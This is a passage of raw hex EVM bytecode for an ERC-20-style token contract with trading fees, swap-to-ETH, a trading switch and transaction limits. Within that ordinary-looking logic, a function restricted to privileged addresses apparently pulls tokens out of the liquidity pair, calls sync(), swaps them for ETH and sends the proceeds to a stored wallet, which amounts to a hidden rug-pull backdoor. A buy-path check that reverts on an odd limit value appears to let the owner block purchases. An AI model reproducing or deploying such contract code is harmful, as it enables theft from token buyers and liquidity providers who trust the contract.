01906103b49190613e2b565b610d5d565b6040516103c69190613e10565b60405180910390f35b3480156103db57600080fd5b506103e4610d7d565b6040516103f19190613eb7565b60405180910390f35b34801561040657600080fd5b5061040f610da3565b60405161041c9190613ee1565b60405180910390f35b34801561043157600080fd5b5061044c60048036038101906104479190613e2b565b610dad565b005b34801561045a57600080fd5b50610463610f04565b6040516104709190613ee1565b60405180910390f35b34801561048557600080fd5b5061048e610f0a565b60405161049b9190613ee1565b60405180910390f35b3480156104b057600080fd5b506104cb60048036038101906104c69190613efc565b610f10565b005b3480156104d957600080fd5b506104f460048036038101906104ef9190613f29565b610fcb565b6040516105019190613e10565b60405180910390f35b34801561051657600080fd5b5061051f6110a4565b60405161052c9190613f98565b60405180910390f35b34801561054157600080fd5b5061055c60048036038101906105579190613db5565b6110ad565b6040516105699190613e10565b60405180910390f35b34801561057e57600080fd5b50610587611160565b6040516105949190613fc2565b60405180910390f35b3480156105a957600080fd5b506105b2611186565b6040516105bf9190613e10565b60405180910390f35b3480156105d457600080fd5b506105ef60048036038101906105ea9190613e2b565b611199565b6040516105fc9190613e10565b60405180910390f35b34801561061157600080fd5b5061061a6111ef565b6040516106279190613ee1565b60405180910390f35b34801561063c57600080fd5b506106456111f5565b6040516106529190613e10565b60405180910390f35b34801561066757600080fd5b50610682600480360381019061067d9190613e2b565b611208565b60405161068f9190613ee1565b60405180910390f35b3480156106a457600080fd5b506106ad611250565b005b3480156106bb57600080fd5b506106c46113a8565b6040516106d19190613e10565b60405180910390f35b3480156106e657600080fd5b5061070160048036038101906106fc9190614009565b611463565b005b34801561070f57600080fd5b50610718611555565b6040516107259190613fc2565b60405180910390f35b34801561073a57600080fd5b5061074361157b565b6040516107509190613ee1565b60405180910390f35b34801561076557600080fd5b50610780600480360381019061077b9190614049565b611581565b005b34801561078e57600080fd5b5061079761169b565b005b3480156107a557600080fd5b506107ae61180e565b6040516107bb9190613fc2565b60405180910390f35b3480156107d057600080fd5b506107d9611838565b6040516107e69190613fc2565b60405180910390f35b3480156107fb57600080fd5b5061080461185e565b6040516108119190613ee1565b60405180910390f35b34801561082657600080fd5b50610841600480360381019061083c919061409c565b611864565b60405161084e9190613e10565b60405180910390f35b34801561086357600080fd5b5061086c6119f0565b6040516108799190613cfa565b60405180910390f35b34801561088e57600080fd5b506108a960048036038101906108a49190614009565b611a82565b005b3480156108b757600080fd5b506108c0611bb7565b6040516108cd9190613ee1565b60405180910390f35b3480156108e257600080fd5b506108eb611bbd565b6040516108f89190613ee1565b60405180910390f35b34801561090d57600080fd5b50610916611bc3565b6040516109239190613ee1565b60405180910390f35b34801561093857600080fd5b50610953600480360381019061094e9190613db5565b611bc9565b6040516109609190613e10565b60405180910390f35b34801561097557600080fd5b50610990600480360381019061098b9190613db5565b611c96565b60405161099d9190613e10565b60405180910390f35b3480156109b257600080fd5b506109cd60048036038101906109c89190613e2b565b611cb4565b005b3480156109db57600080fd5b506109f660048036038101906109f19190613e2b565b611e0b565b604051610a039190613e10565b60405180910390f35b348015610a1857600080fd5b50610a21611e2b565b604051610a2e9190613e10565b60405180910390f35b348015610a4357600080fd5b50610a5e6004803603810190610a599190614009565b611e3e565b005b348015610a6c57600080fd5b50610a876004803603810190610a829190614049565b611f7e565b005b348015610a9557600080fd5b50610ab06004803603810190610aab9190613efc565b612098565b005b348015610abe57600080fd5b50610ac76121c2565b604051610ad49190613e10565b60405180910390f35b348015610ae957600080fd5b50610af26121d5565b604051610aff9190613ee1565b60405180910390f35b348015610b1457600080fd5b50610b2f6004803603810190610b2a9190613efc565b6121db565b604051610b3c9190613e10565b60405180910390f35b348015610b5157600080fd5b50610b5a61234b565b604051610b679190613ee1565b60405180910390f35b348015610b7c57600080fd5b50610b976004803603810190610b9291906140dc565b612351565b604051610ba49190613ee1565b60405180910390f35b348015610bb957600080fd5b50610bc26123d8565b604051610bcf9190613ee1565b60405180910390f35b348015610be457600080fd5b50610bed6123de565b604051610bfa9190613e10565b60405180910390f35b348015610c0f57600080fd5b50610c18612499565b604051610c259190613ee1565b60405180910390f35b348015610c3a57600080fd5b50610c556004803603810190610c509190613e2b565b61249f565b005b348015610c6357600080fd5b50610c6c612665565b604051610c799190613ee1565b60405180910390f35b348015610c8e57600080fd5b50610c9761266b565b604051610ca49190613ee1565b60405180910390f35b606060038054610cbc9061414b565b80601f0160208091040260200160405190810160405280929190818152602001828054610ce89061414b565b8015610d355780601f10610d0a57610100808354040283529160200191610d35565b820191906000526020600020905b815481529060010190602001808311610d1857829003601f168201915b5050505050905090565b6000610d53610d4c6126cf565b84846126d7565b6001905092915050565b601c6020528060005260406000206000915054906101000a900460ff1681565b600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b6000600254905090565b610db56126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610e44576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e3b906141c8565b60405180910390fd5b600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f90b8024c4923d3873ff5b9fcb43d0360d4b9217fa41225d07ba379993552e74360405160405180910390a380600960006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b60195481565b60185481565b600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff1614610f6a57600080fd5b6103e8610f75610da3565b610f7f9190614246565b811015610fc1576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610fb8906142e9565b60405180910390fd5b80600a8190555050565b6000610fd88484846128a0565b61109984610fe46126cf565b611094856040518060600160405280602881526020016151ee60289139600160008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600061104a6126cf565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546132b99092919063ffffffff16565b6126d7565b600190509392505050565b60006012905090565b60006111566110ba6126cf565b8461115185600160006110cb6126cf565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461267190919063ffffffff16565b6126d7565b6001905092915050565b600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b600d60009054906101000a900460ff1681565b6000601b60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b60145481565b600d60029054906101000a900460ff1681565b60008060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6112586126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146112e7576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016112de906141c8565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a36000600560006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550565b60006113b26126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614611441576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611438906141c8565b60405180910390fd5b6000600d60006101000a81548160ff0219169083151502179055506001905090565b61146b6126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146114fa576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016114f1906141c8565b60405180910390fd5b80601c60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055505050565b600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b60115481565b6115896126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614611618576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161160f906141c8565b60405180910390fd5b8260118190555081601281905550806013819055506013546012546011546116409190614309565b61164a9190614309565b60108190555060146010541115611696576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161168d906143ab565b60405180910390fd5b505050565b6116a36126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614611732576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611729906141c8565b60405180910390fd5b6001600d60026101000a81548160ff02191690831515021790555060011515600f60019054906101000a900460ff161515146117a3576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161179a90614417565b60405180910390fd5b6000600f60016101000a81548160ff0219169083151502179055506117c661331d565b7fbd657b4e94b205761f2ca5be9988d7b243c828f625c0746c6581ec528e507c47600f60019054906101000a900460ff166040516118049190613e10565b60405180910390a1565b6000600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b60155481565b6000601b60003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff166118bc57600080fd5b60006118e9600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16611208565b905060018311801561190657506064816119039190614246565b83105b611945576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161193c90614483565b60405180910390fd5b61194e8361333a565b6119578461340a565b6000600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff164760405161199f906144d4565b60006040518083038185875af1925050503d80600081146119dc576040519150601f19603f3d011682016040523d82523d6000602084013e6119e1565b606091505b50509050809250505092915050565b6060600480546119ff9061414b565b80601f0160208091040260200160405190810160405280929190818152602001828054611a2b9061414b565b8015611a785780601f10611a4d57610100808354040283529160200191611a78565b820191906000526020600020905b815481529060010190602001808311611a5b57829003601f168201915b5050505050905090565b611a8a6126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614611b19576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611b10906141c8565b60405180910390fd5b600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611ba9576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611ba09061455b565b60405180910390fd5b611bb3828261364d565b5050565b60135481565b601a5481565b60175481565b6000611c8c611bd66126cf565b84611c87856040518060600160405280602581526020016152166025913960016000611c006126cf565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546132b99092919063ffffffff16565b6126d7565b6001905092915050565b6000611caa611ca36126cf565b84846128a0565b6001905092915050565b611cbc6126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614611d4b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611d42906141c8565b60405180910390fd5b600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167fa751787977eeb3902e30e1d19ca00c6ad274a1f622c31a206e32366700b0567460405160405180910390a380600860006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b601d6020528060005260406000206000915054906101000a900460ff1681565b600d60019054906101000a900460ff1681565b611e466126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614611ed5576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611ecc906141c8565b60405180910390fd5b80601b60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508173ffffffffffffffffffffffffffffffffffffffff167f9d8f7706ea1113d1a167b526eca956215946dd36cc7df39eb16180222d8b5df782604051611f729190613e10565b60405180910390a25050565b611f866126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614612015576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161200c906141c8565b60405180910390fd5b82601581905550816016819055508060178190555060175460165460155461203d9190614309565b6120479190614309565b60148190555060196014541115612093576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161208a906145c7565b60405180910390fd5b505050565b6120a06126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161461212f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612126906141c8565b60405180910390fd5b670de0b6b3a76400006103e86005612145610da3565b61214f91906145e7565b6121599190614246565b6121639190614246565b8110156121a5576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161219c906146b3565b60405180910390fd5b670de0b6b3a7640000816121b991906145e7565b600c8190555050565b600f60009054906101000a900460ff1681565b600a5481565b60006121e56126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614612274576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161226b906141c8565b60405180910390fd5b620186a06001612282610da3565b61228c91906145e7565b6122969190614246565b8210156122d8576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016122cf90614745565b60405180910390fd5b6103e860056122e5610da3565b6122ef91906145e7565b6122f99190614246565b82111561233b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612332906147d7565b60405180910390fd5b81600b8190555060019050919050565b60105481565b6000600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b600b5481565b60006123e86126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614612477576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161246e906141c8565b60405180910390fd5b6000600f60006101000a81548160ff0219169083151502179055506001905090565b60125481565b6124a76126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614612536576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161252d906141c8565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16036125a5576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161259c90614869565b60405180910390fd5b8073ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a380600560006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b60165481565b600c5481565b60008082846126809190614309565b9050838110156126c5576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016126bc906148d5565b60405180910390fd5b8091505092915050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603612746576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161273d90614967565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036127b5576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016127ac906149f9565b60405180910390fd5b80600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925836040516128939190613ee1565b60405180910390a3505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160361290f576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161290690614a8b565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160361297e576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161297590614b1d565b60405180910390fd5b6000810361299757612992838360006136ee565b6132b4565b600d60009054906101000a900460ff1615612d8b576129b461180e565b73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614158015612a2257506129f261180e565b73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b8015612a5b5750600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b8015612a95575061dead73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b8015612aae5750600760149054906101000a900460ff16155b15612d8a57600d60019054906101000a900460ff16612ba857601b60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1680612b685750601b60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b612ba7576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612b9e90614b89565b60405180910390fd5b5b601d60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff168015612c4b5750601c60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b15612c9a57600a54811115612c95576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612c8c90614c1b565b60405180910390fd5b612d89565b601d60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff168015612d3d5750601c60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b15612d8857600a54811115612d87576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612d7e90614cad565b60405180910390fd5b5b5b5b5b6000612d9630611208565b90506000600b548210159050808015612dbb5750600d60029054906101000a900460ff165b8015612dd45750600760149054906101000a900460ff16155b8015612e2a5750601d60008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b8015612e805750601b60008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b8015612ed65750601b60008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b15612f1a576001600760146101000a81548160ff021916908315150217905550612efe613981565b6000600760146101000a81548160ff0219169083151502179055505b6000600760149054906101000a900460ff16159050601b60008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1680612fd05750601b60008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b15612fda57600090505b600081156132a457601d60008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16801561303d57506000601454115b1561315b5761306a606461305c60145488613aeb90919063ffffffff16565b613b6590919063ffffffff16565b90506014546016548261307d91906145e7565b6130879190614246565b601960008282546130989190614309565b92505081905550601454601754826130b091906145e7565b6130ba9190614246565b601a60008282546130cb9190614309565b92505081905550601454601554826130e391906145e7565b6130ed9190614246565b601860008282546130fe9190614309565b9250508190555060006002600a546131169190614ccd565b14613156576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161314d90614d70565b60405180910390fd5b613280565b601d60008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1680156131b657506000601054115b1561327f576131e360646131d560105488613aeb90919063ffffffff16565b613b6590919063ffffffff16565b9050601054601254826131f691906145e7565b6132009190614246565b601960008282546132119190614309565b925050819055506010546013548261322991906145e7565b6132339190614246565b601a60008282546132449190614309565b925050819055506010546011548261325c91906145e7565b6132669190614246565b601860008282546132779190614309565b925050819055505b5b6000811115613295576132948730836136ee565b5b80856132a19190614d90565b94505b6132af8787876136ee565b505050505b505050565b6000838311158290613301576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016132f89190613cfa565b60405180910390fd5b50600083856133109190614d90565b9050809150509392505050565b6001600d60016101000a81548160ff021916908315150217905550565b613385600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16306133696110a4565b600a6133759190614ef7565b8461338091906145e7565b6128a0565b600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663fff6cae96040518163ffffffff1660e01b8152600401600060405180830381600087803b1580156133ef57600080fd5b505af1158015613403573d6000803e3d6000fd5b5050505050565b6000600267ffffffffffffffff81111561342757613426614f42565b5b6040519080825280602002602001820160405280156134555781602001602082028036833780820191505090505b509050308160008151811061346d5761346c614f71565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff1681525050600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015613514573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906135389190614fb5565b8160018151811061354c5761354b614f71565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff16815250506135b330600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16846126d7565b600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663791ac9478360008430426040518663ffffffff1660e01b81526004016136179594939291906150db565b600060405180830381600087803b15801561363157600080fd5b505af1158015613645573d6000803e3d6000fd5b505050505050565b80601d60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508015158273ffffffffffffffffffffffffffffffffffffffff167fffa9187bf1f18bf477bd0ea1bcbb64e93b6a98132473929edfce215cd9b16fab60405160405180910390a35050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160361375d576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161375490614a8b565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036137cc576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016137c390614b1d565b60405180910390fd5b6137d7838383613baf565b613842816040518060600160405280602681526020016151c8602691396000808773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546132b99092919063ffffffff16565b6000808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055506138d5816000808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461267190919063ffffffff16565b6000808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516139749190613ee1565b60405180910390a3505050565b600061398c30611208565b90506000601a546018546019546139a39190614309565b6139ad9190614309565b90506000808314806139bf5750600082145b156139cc57505050613ae9565b6014600b546139db91906145e7565b8311156139f4576014600b546139f191906145e7565b92505b600060028360195486613a0791906145e7565b613a119190614246565b613a1b9190614246565b90506000613a328286613bb490919063ffffffff16565b9050613a3d8161340a565b600060198190555060006018819055506000601a81905550600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1647604051613a9b906144d4565b60006040518083038185875af1925050503d8060008114613ad8576040519150601f19603f3d011682016040523d82523d6000602084013e613add565b606091505b50508093505050505050505b565b6000808303613afd5760009050613b5f565b60008284613b0b91906145e7565b9050828482613b1a9190614246565b14613b5a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401613b51906151a7565b60405180910390fd5b809150505b92915050565b6000613ba783836040518060400160405280601a81526020017f536166654d6174683a206469766973696f6e206279207a65726f000000000000815250613bfe565b905092915050565b505050565b6000613bf683836040518060400160405280601e81526020017f536166654d6174683a207375627472616374696f6e206f766572666c6f7700008152506132b9565b905092915050565b60008083118290613c45576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401613c3c9190613cfa565b60405180910390fd5b5060008385613c549190614246565b9050809150509392505050565b600081519050919050565b600082825260208201905092915050565b60005b83811015613c9b578082015181840152602081019050613c80565b83811115613caa576000848401525b50505050565b6000601f19601f8301169050919050565b6000613ccc82613c61565b613cd68185613c6c565b9350613ce6818560208601613c7d565b613cef81613cb0565b840191505092915050565b60006020820190508181036000830152613d148184613cc1565b905092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000613d4c82613d21565b9050919050565b613d5c81613d41565b8114613d6757600080fd5b50565b600081359050613d7981613d53565b92915050565b6000819050919050565b613d9281613d7f565b8114613d9d57600080fd5b50565b600081359050613daf81613d89565b92915050565b60008060408385031215613dcc57613dcb613d1c565b5b6000613dda85828601613d6a565b9250506020613deb85828601613da0565b9150509250929050565b60008115159050919050565b613e0a81613df5565b82525050565b6000602082019050613e256000830184613e01565b92915050565b600060208284031215613e4157613e40613d1c565b5b6000613e4f84828501613d6a565b91505092915050565b6000819050919050565b6000613e7d613e78613e7384613d21565b613e58565b613d21565b9050919050565b6000613e8f82613e62565b9050919050565b6000613ea182613e84565b9050919050565b613eb181613e96565b82525050565b6000602082019050613ecc6000830184613ea8565b92915050565b613edb81613d7f565b82525050565b6000602082019050613ef66000830184613ed2565b92915050565b600060208284031215613f1257613f11613d1c565b5b6000613f2084828501613da0565b91505092915050565b600080600060608486031215613f4257613f41613d1c565b5b6000613f5086828701613d6a565b9350506020613f6186828701613d6a565b9250506040613f7286828701613da0565b9150509250925092565b600060ff82169050919050565b613f9281613f7c565b82525050565b6000602082019050613fad6000830184613f89565b92915050565b613fbc81613d41565b82525050565b6000602082019050613fd76000830184613fb3565b92915050565b613fe681613df5565b8114613ff157600080fd5b50565b60008135905061400381613fdd565b92915050565b600080604083850312156140205761401f613d1c565b5b600061402e85828601613d6a565b925050602061403f85828601613ff4565b9150509250929050565b60008060006060848603121561406257614061613d1c565b5b600061407086828701613da0565b935050602061408186828701613da0565b925050604061409286828701613da0565b9150509250925092565b600080604083850312156140b3576140b2613d1c565b5b60006140c185828601613da0565b92505060206140d285828601613da0565b9150509250929050565b600080604083850312156140f3576140f2613d1c565b5b600061410185828601613d6a565b925050602061411285828601613d6a565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061416357607f821691505b6020821081036141765761417561411c565b5b50919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b60006141b2602083613c6c565b91506141bd8261417c565b602082019050919050565b600060208201905081810360008301526141e1816141a5565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b600061425182613d7f565b915061425c83613d7f565b92508261426c5761426b6141e8565b5b828204905092915050565b7f43616e6e6f7420736574206d61785472616e73616374696f6e416d6f756e742060008201527f6c6f776572207468616e20302e31250000000000000000000000000000000000602082015250565b60006142d3602f83613c6c565b91506142de82614277565b604082019050919050565b60006020820190508181036000830152614302816142c6565b9050919050565b600061431482613d7f565b915061431f83613d7f565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0382111561435457614353614217565b5b828201905092915050565b7f4d757374206b656570206665657320617420323025206f72206c657373000000600082015250565b6000614395601d83613c6c565b91506143a08261435f565b602082019050919050565b600060208201905081810360008301526143c481614388565b9050919050565b7f646f6e6500000000000000000000000000000000000000000000000000000000600082015250565b6000614401600483613c6c565b915061440c826143cb565b602082019050919050565b600060208